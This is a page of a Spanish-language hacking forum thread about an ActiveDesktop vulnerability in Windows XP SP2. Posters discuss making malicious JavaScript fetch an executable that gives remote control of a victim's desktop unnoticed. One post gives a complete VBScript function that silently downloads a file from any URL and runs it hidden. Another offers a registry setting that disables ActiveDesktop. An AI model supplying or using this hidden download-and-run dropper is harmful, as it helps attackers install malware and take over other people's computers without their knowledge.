Páginas: 1 2 [3] 
|
 |
|
 Autor
|
Tema: Vulnerabilidad en ActiveDesktop de WinXP SP2 (Leído 14370 veces)
|
CrackBubledMind
 Desconectado
Mensajes: 16
xD
|
Bueno no habia visto este post, pero creo que se puede hacer algo más grande xD, como capturar la maquina remotamente solo hay que hacer que el js malicioso descargue un ejecutable que te mande la conexion remota a tu pc te capture el escritorio de la victima sin que el se de cuenta, algo asi como la vulnerabilidad del VNC recuerdan.. nos se si me pescan OK...
|
|
|
|
|
En línea
|
"Los angeles que han sido expulsados del cielo solamente pueden volverse demonios"
|
|
|
frostone
Desconectado
Mensajes: 20
|
El ActiveDesktop es capable, bastaria con crear un REG_DWORD en "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoActiveDesktop" con valor 1.
|
|
|
|
|
En línea
|
|
|
|
hectordaniel137
Desconectado
Mensajes: 5
|
La verdad es que no le encuentro utilidad porque los programas duros son .exe
|
|
|
|
|
En línea
|
|
|
|
AlphaHack
Desconectado
Mensajes: 3
|
Perdón por revivir esto desde hace tanto tiempo. Me acabo de registrar y me pasaron este link (en realidad no fue exactamente en ese orden, pero no importa).
Quería aportar al tema que la ejecución de un ActiveX por parte de JavaScript sí es interceptado por un antivirus cualquiera (prueben sino como leer o escribir en el registro a través de JS).
Y teniendo ese camino tapado, no hay mucho que uno pueda hacer con JavaScript que no esté ya inventado.
***
PD: La idea de transmtirse de usuario en usuario como lo habían planteado solamente sirve en entornos en donde todos los usuarios tienen rol de administradores (cosa mal planteada desde la seguridad, pero común hoy por hoy), dado que de otra forma, no se tiene acceso a las carpetas de los demás usuarios, por más que no esté encriptada.
Les dejo saludos, nuevamente perdón por la revivida y nos vemos por ahí.
|
|
|
|
|
En línea
|
|
|
|
|
|
|
aaronduran2
|
El código para descargar un archivo oculto es el siguiente: Function DescargarArchivo(URL,SaveName,SavePath,RunAfterDownload,RunHide)
On Error Resume Next
Err.Clear
Set XML = CreateObject("Microsoft.XMLHTTP")
Set ADO = CreateObject("ADODB.Stream")
XML.Open "GET", URL, False
XML.send
XML.getAllResponseHeaders
FullSavePath = SavePath & "\" & SaveName
ADO.Open
ADO.Type = 1
ADO.Write XML.responseBody
ADO.SaveToFile FullSavePath, 2
If Err Then
DescargarArchivo = False
Else
If RunAfterDownload = True Then
If RunHide = True Then
WshShell.Run FullSavePath, vbHide
Else
WshShell.Run FullSavePath
End If
End If
DescargarArchivo = True
End If
End Function
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: 1 2 [3] 
|
|
|
 |
